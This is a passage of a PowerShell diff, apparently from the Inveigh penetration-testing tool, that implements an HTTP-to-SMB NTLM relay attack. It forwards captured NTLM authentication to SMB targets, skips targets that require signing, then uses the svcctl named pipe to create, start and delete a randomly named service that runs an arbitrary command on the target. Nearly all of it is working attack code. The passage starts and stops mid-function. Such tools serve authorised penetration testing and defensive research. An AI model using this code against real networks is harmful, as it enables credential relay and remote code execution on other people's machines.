+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version = 'SMB1'
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+ else
+ {
+ $SMB_client_stage = 'NegotiateSMB2'
+ }
+
+ if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03'))
+ {
+ $inveigh.target_list.Remove($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed target $($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) due to signing requirement")
+ $SMB_relay_socket.Close()
+ $SMB_client_receive = $null # ?
+ $SMB_client_stage = 'exit'
+ }
+ elseif($signing_check)
+ {
+ $SMB_relay_socket.Close()
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ 'NegotiateSMB2'
+ {
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_message_ID = 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
+ 'NTLMSSPNegotiate'
+ {
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ }
+
+ return $SMB_client_receive
+ }
+
+ function SMBRelayResponse
+ {
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+
+ $SMB_client_receive = New-Object System.Byte[] 1024
+
+ if($SMB_relay_socket)
+ {
+ $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
+ }
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header["UserID"] = $SMB_user_ID
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_auth
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID = 3
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_response_stream.Flush()
+ $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00'))
+ {
+ $SMB_relay_failed = $false
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication successful for $HTTP_username_full on $Target") > $null
+ }
+ else
+ {
+
+ if($HTTP_NTLM_domain_string -ne '')
+ {
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $SMB_relay_failed = $true
+ $SMB_relay_socket.Close()
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication failed for $HTTP_username_full on $Target") > $null
+ }
+
+ return $SMB_relay_failed
+ }
+
+ function SMBRelayExecute
+ {
+ param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+
+ $SMB_client_receive = New-Object System.Byte[] 1024
+
+ if(!$Service)
+ {
+ $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+ $SMB_service = $SMB_service_random -replace "-00",""
+ $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+ $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
+ $SMB_service_random += '00-00-00-00-00'
+ $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $SMB_service = $Service
+ $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($Service)
+
+ if([Bool]($SMB_service.Length % 2))
+ {
+ $SMB_service_bytes += 0x00,0x00
+ }
+ else
+ {
+ $SMB_service_bytes += 0x00,0x00,0x00,0x00
+
+ }
+
+ }
+
+ $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1)
+ $Command = "%COMSPEC% /C `"" + $Command + "`""
+ [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$SMBExec_command += "{0:X2}-00-" -f $_}
+
+ if([Bool]($Command.Length % 2))
+ {
+ $SMBExec_command += '00-00'
+ }
+ else
+ {
+ $SMBExec_command += '00-00-00-00'
+ }
+
+ $SMBExec_command_bytes = $SMBExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMBExec_command_length_bytes = [System.BitConverter]::GetBytes($SMBExec_command_bytes.Length / 2)
+
+ $SMB_path = "\\" + $Target + "\IPC$"
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00
+ }
+ else
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ }
+
+ $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
+ $SMB_client_stream = $SMB_relay_socket.GetStream()
+ $SMB_split_index = 4256
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_client_stage = 'TreeConnectAndXRequest'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'Exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnectAndXRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateAndXRequest'
+ }
+
+ 'CreateAndXRequest'
+ {
+ $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
+ $SMB_tree_ID = $SMB_client_receive[28,29]
+ $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_FID = $SMB_client_receive[42,43]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadAndXRequest'
+ {
+ Start-Sleep -m 150
+ $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBReadAndXRequest
+ $packet_SMB_data["FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ 'OpenSCManagerW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $SMB_service_manager_context_handle = $SMB_client_receive[88..107]
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has execution privilege on $Target") > $null
+
+ if($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
+ {
+ $SMB_relay_failed = $true
+
+ if($HTTP_NTLM_domain_string -ne '')
+ {
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
+ {
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ }
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have execution privilege on $Target") > $null
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service created on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute SMB relay command on $Target") > $null
+ $SMB_service_context_handle = $SMB_client_receive[92..111]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
+ {
+ $SMB_relay_failed = $true
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service creation failed on $Target") > $null
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay command executed on $Target") > $null
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service failed to start on $Target") > $null
+ }
+
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ $SMB_close_service_handle_stage++
